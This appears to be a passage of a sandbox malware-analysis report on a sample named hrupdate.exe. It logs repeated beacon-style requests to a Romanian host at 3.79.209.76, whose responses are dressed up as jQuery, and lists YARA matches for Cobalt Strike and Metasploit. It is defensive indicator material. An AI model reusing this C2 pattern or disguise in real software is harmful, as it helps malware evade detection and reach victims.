                                                              2024-12-19 21:41:47 UTC5607INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              44192.168.2.4498883.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:41:49 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:49 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:49 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5607
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:49 UTC5607INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              45192.168.2.4498943.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:41:51 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:51 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:51 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5671
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:51 UTC5671INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              46192.168.2.4499013.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:41:53 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:54 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:53 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5628
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:54 UTC5628INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              47192.168.2.4499073.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:41:55 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:56 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:56 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5649
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:56 UTC5649INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              48192.168.2.4499133.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:41:57 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:58 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:58 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5649
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:58 UTC5649INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              49192.168.2.4499193.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:42:00 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:42:00 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:42:00 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5713
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:42:00 UTC5713INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              50192.168.2.4499263.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:42:02 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:42:03 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:42:02 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5671
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:42:03 UTC5671INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              51192.168.2.4499323.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:42:04 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:42:05 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:42:05 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5628
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:42:05 UTC5628INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              52192.168.2.4499383.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:42:07 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:42:07 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:42:07 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5692
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:42:07 UTC5692INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:16:40:01
                                                              Start date:19/12/2024
                                                              Path:C:\Users\user\Desktop\hrupdate.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\hrupdate.exe"
                                                              Imagebase:0xb00000
                                                              File size:244'224 bytes
                                                              MD5 hash:03B14E9338A1C9E5551F9450207F6D84
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2210862324.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2210862324.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2210862324.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.2210862324.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.2210862324.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2210862324.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
